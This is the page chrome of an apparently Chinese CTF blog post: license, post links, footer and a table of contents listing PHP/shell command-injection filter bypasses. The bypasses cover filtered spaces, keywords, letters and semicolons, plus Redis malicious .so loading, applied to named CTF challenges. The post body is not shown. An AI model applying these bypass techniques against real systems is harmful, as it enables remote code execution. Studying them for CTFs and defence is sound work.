</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://1768161086.github,io">userq</a></p><p> <span>Link:  </span><a href="http://1768161086.github,io/2025/01/20/new/">http://1768161086.github,io/2025/01/20/new/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2025/01/21/one/" title="ctfshow web80文件包含"><span>< PreviousPost</span><br><span class="prevTitle">ctfshow web80文件包含</span></a><a class="nextSlogan" href="/2025/01/14/hello-world/" title="Hello World"><span>NextPost ></span><br><span class="nextTitle">Hello World</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-%E8%BF%87%E6%BB%A4%E7%A9%BA%E6%A0%BC"><span class="toc-number">1.</span> <span class="toc-text">1.过滤空格</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-%E8%BF%87%E6%BB%A4%E5%85%B3%E9%94%AE%E5%AD%97-cat%E3%80%81flag%E7%AD%89"><span class="toc-number">2.</span> <span class="toc-text">2.过滤关键字(cat、flag等)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E5%91%BD%E4%BB%A4%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">相关命令：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-%E8%BF%87%E6%BB%A4-c-a-t"><span class="toc-number">3.</span> <span class="toc-text">3.过滤*c *a *t</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-%E8%BF%87%E6%BB%A4%E5%AD%97%E6%AF%8D-a-z"><span class="toc-number">4.</span> <span class="toc-text">4.过滤字母[a-z]</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-%E8%BF%87%E6%BB%A4%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97%E7%A9%BA%E6%A0%BC"><span class="toc-number">5.</span> <span class="toc-text">5.过滤字母数字空格</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web57-%E5%8F%96%E5%8F%8D"><span class="toc-number">5.0.1.</span> <span class="toc-text">web57($(())取反):</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-%E8%BF%87%E6%BB%A4system"><span class="toc-number">6.</span> <span class="toc-text">6.过滤system</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7-%E6%9F%A5%E7%9C%8B%E5%BD%93%E5%89%8D%E7%9B%AE%E5%BD%95"><span class="toc-number">7.</span> <span class="toc-text">7.查看当前目录</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#8-%E5%AD%97%E6%AF%8D-%E6%95%B0%E5%AD%97%E5%88%AB%E6%9B%BF%E6%88%90%EF%BC%9F"><span class="toc-number">8.</span> <span class="toc-text">8.字母&#x2F;数字别替成？</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#9-e%E6%A8%A1%E5%BC%8F%E4%B8%8B%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="toc-number">9.</span> <span class="toc-text">9.e模式下的漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%EF%BC%9AXYCTF2024-warm-up"><span class="toc-number">9.1.</span> <span class="toc-text">例：XYCTF2024 warm up</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%A1%A5%E5%85%85%EF%BC%9A-%E8%A2%AB%E8%BF%87%E6%BB%A4%EF%BC%9A"><span class="toc-number">10.</span> <span class="toc-text">补充：;被过滤：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E9%97%AD%E5%90%88%E5%8F%AF%E4%BB%A5%E7%94%A8system-ls-%E7%BB%95%E8%BF%87"><span class="toc-number">10.1.</span> <span class="toc-text">1.?&gt;闭合可以用system(&#39;ls &#x2F;&#39;);绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-redis%E5%8A%A0%E8%BD%BD%E6%81%B6%E6%84%8Fso%E6%96%87%E4%BB%B6"><span class="toc-number">10.1.0.1.</span> <span class="toc-text">2.redis加载恶意so文件</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-if-preg-match-A-Za-z0-9-code"><span class="toc-number">10.2.</span> <span class="toc-text">3.if(preg_match(&quot;&#x2F;[A-Za-z0-9]+&#x2F;&quot;,$code)){</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-Basectf-1z-php-echo-new-a-b-c"><span class="toc-number">10.3.</span> <span class="toc-text">10.Basectf 1z_php  echo (new $a($b))-&gt;$c();</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-Basectf-%E7%8E%A9%E5%8E%9F%E7%A5%9E%E7%8E%A9%E7%9A%84"><span class="toc-number">10.4.</span> <span class="toc-text">11.Basectf  玩原神玩的</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ISCTF-ezrce"><span class="toc-number">10.5.</span> <span class="toc-text">ISCTF ezrce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ISCTF-%E5%8D%83%E5%B9%B4%E6%A8%B1"><span class="toc-number">10.6.</span> <span class="toc-text">ISCTF  千年樱</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A6%81%E7%94%A8-b-h-m-r"><span class="toc-number">10.7.</span> <span class="toc-text">禁用[b-h]|[m-r]</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E5%AD%97%E7%99%BD%E5%90%8D%E5%8D%95"><span class="toc-number">10.8.</span> <span class="toc-text">数字白名单</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XYCTF%E7%89%A2%E7%89%A2%E8%AE%B0%E4%BD%8F%EF%BC%8C%E9%80%9D%E8%80%85%E4%B8%BA%E5%A4%A7"><span class="toc-number">10.9.</span> <span class="toc-text">XYCTF牢牢记住，逝者为大</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E8%8A%B1%E6%8B%AC%E5%8F%B7%E6%88%96%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D%E7%BB%95%E8%BF%87"><span class="toc-number">10.10.</span> <span class="toc-text">利用花括号或正则匹配绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BaseCTF-ez-php-jail"><span class="toc-number">10.11.</span> <span class="toc-text">BaseCTF_ez_php_jail</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#LitCTF-2024-%E7%99%BE%E4%B8%87%E7%BE%8E%E5%85%83%E7%9A%84%E8%AF%B1%E6%83%91"><span class="toc-number">10.12.</span> <span class="toc-text">[LitCTF 2024]百万美元的诱惑</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SWPUCTF-2024-%E7%A7%8B%E5%AD%A3%E6%96%B0%E7%94%9F%E8%B5%9B-%E6%9C%AA%E9%80%89%E6%8B%A9%E7%9A%84%E8%B7%AF"><span class="toc-number">10.13.</span> <span class="toc-text">[SWPUCTF 2024 秋季新生赛]未选择的路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GHCTF-2024-PermissionDenied"><span class="toc-number">10.14.</span> <span class="toc-text">[GHCTF 2024]PermissionDenied</span></a></li></ol></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>